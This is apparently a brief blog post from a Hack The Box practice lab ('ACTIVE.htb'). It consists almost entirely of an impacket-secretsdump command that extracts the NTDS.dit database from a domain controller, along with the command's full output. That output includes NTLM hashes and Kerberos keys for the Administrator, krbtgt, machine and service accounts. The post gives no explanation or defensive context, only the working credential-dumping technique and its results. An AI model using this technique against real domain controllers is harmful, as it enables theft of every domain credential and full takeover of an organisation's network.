Pages

Hash Dumping - NTLM

impacket-secretsdump  -just-dc ACTIVE.htb/Administrator@10.10.10.100 -use-vss
 
Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation

Password:
[*] Target system bootKey: 0xff954ee81ffb63937b563f523caf1d59
[*] Searching for NTDS.dit
[*] Registry says NTDS.dit is at C:\Windows\NTDS\ntds.dit. Calling vssadmin to get a copy. This might take some time
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: ed534631c56761ebb03df2c7bbc18b12
[*] Reading and decrypting hashes from \\10.10.10.100\ADMIN$\Temp\jVykSHdL.tmp
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5ffb4aaaf9b63dc519eca04aec0e8bed:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:af19ec65874cc2b8090cde7d8f4152ca:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b889e0d47d6fe22c8f0463a717f460dc:::
active.htb\SVC_TGS:1103:aad3b435b51404eeaad3b435b51404ee:f54f3a1d3c38140684ff4dad029f25b5:::
[*] Kerberos keys from \\10.10.10.100\ADMIN$\Temp\jVykSHdL.tmp
Administrator:aes256-cts-hmac-sha1-96:003b207686cfdbee91ff9f5671aa10c5d940137da387173507b7ff00648b40d8
Administrator:aes128-cts-hmac-sha1-96:48347871a9f7c5346c356d76313668fe
Administrator:des-cbc-md5:5891549b31f2c294
DC$:aes256-cts-hmac-sha1-96:831c7121df34c61f71b1e4dccd1f27f43c93742d556906f6952eaa40cb768625
DC$:aes128-cts-hmac-sha1-96:e580dfb4a0df0665bb49ae2918daf235
DC$:des-cbc-md5:02861ca1a71907a1
krbtgt:aes256-cts-hmac-sha1-96:cd80d318efb2f8752767cd619731b6705cf59df462900fb37310b662c9cf51e9
krbtgt:aes128-cts-hmac-sha1-96:b9a02d7bd319781bc1e0a890f69304c3
krbtgt:des-cbc-md5:9d044f891adf7629
active.htb\SVC_TGS:aes256-cts-hmac-sha1-96:d59943174b17c1a4ced88cc24855ef242ad328201126d296bb66aa9588e19b4a
active.htb\SVC_TGS:aes128-cts-hmac-sha1-96:f03559334c1111d6f792d74a453d6f31
active.htb\SVC_TGS:des-cbc-md5:d6c7eca70862f1d0
[*] Cleaning up...

No comments:

Post a Comment